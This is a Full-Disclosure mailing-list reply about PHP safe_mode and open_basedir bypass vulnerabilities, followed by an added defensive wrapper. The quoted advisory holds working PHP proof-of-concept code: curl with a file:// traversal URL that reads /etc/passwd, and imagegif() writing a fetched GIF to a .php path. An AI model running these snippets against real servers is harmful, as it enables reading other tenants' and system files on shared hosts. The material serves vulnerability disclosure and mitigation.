In regards to the curl, I have just checked all the PHP curl code; this was fixed in 4.3.10 from
what I can see, because I wrote a patch to stop the openbase dir in
curl until PHP fixed it. I submitted it a long time ago but the PHP devs
were all "blah blah blah 3rd party software blah blah not our problem".
I'm not sure if there's a patch for the imagegif() as
I haven't seen that one before.
----- Original Message -----
Sent: Tuesday, October 18, 2005 9:55 AM
Subject: [Full-disclosure] PHP Safedir Restriction Bypass Vulnerabilities
with an image like http://81.57.125.106/~slythers/file.gif
<?php
$im = imagecreatefromgif("file.gif");
imagegif($im, '/var/www/f34r.fr/c/f/elbossoso/.i.need.money.php');
?>
curl openbasedir and safemode bypass. POC:
<?php
mkdir("./".$_SERVER["SCRIPT_NAME"]."?");
$ch = curl_init("file://".$_SERVER["SCRIPT_FILENAME"]."?/../../../../../../../../../../../etc/passwd");
$file=curl_exec($ch);
echo $file;
?>
As you notice, we can bypass the safedir which leads to access to any files on any shared servers.
This is fixed in the cvs.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
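
Added example (not part of either message, and not the patch mentioned in the reply): a PHP wrapper that keeps libcurl to HTTP(S) so a file:// URL like the one in the PoC is never handled, plus a canonical-path check for files written by calls such as imagegif(). The function names and the temporary base directory are assumptions made for illustration.

```php
<?php
// Added example, not code from the post. $base is an assumed per-site directory.

/** Canonical path if $path resolves inside $base, otherwise null. */
function path_inside_base(string $path, string $base): ?string
{
    $realBase = realpath($base);
    // The output file may not exist yet, so resolve its parent directory.
    $realDir = realpath(dirname($path));
    $name = basename($path);
    if ($realBase === false || $realDir === false || $name === '.' || $name === '..') {
        return null;
    }
    $full = $realDir . DIRECTORY_SEPARATOR . $name;
    if (is_link($full)) {
        return null; // an existing symlink could point outside the base
    }
    // Trailing separator stops /srv/site from matching /srv/site-other.
    $prefix = rtrim($realBase, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : null;
}

/** Fetch a URL with libcurl limited to HTTP(S), so file:// is never handled. */
function fetch_http_only(string $url): string
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        throw new InvalidArgumentException("scheme not allowed: '$scheme'");
    }
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $body = curl_exec($ch);
    if ($body === false) {
        throw new RuntimeException('transfer failed: ' . curl_error($ch));
    }
    return $body;
}

// Constructed demo: a temporary directory stands in for the site's base.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'site_' . getmypid();
@mkdir($base . '/img', 0700, true);
var_dump(path_inside_base("$base/img/out.gif", $base) !== null);          // inside the base
var_dump(path_inside_base("$base/img/../../etc/passwd", $base) !== null); // traversal attempt
try {
    fetch_http_only('file://' . __FILE__ . '?/../../etc/passwd');
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
```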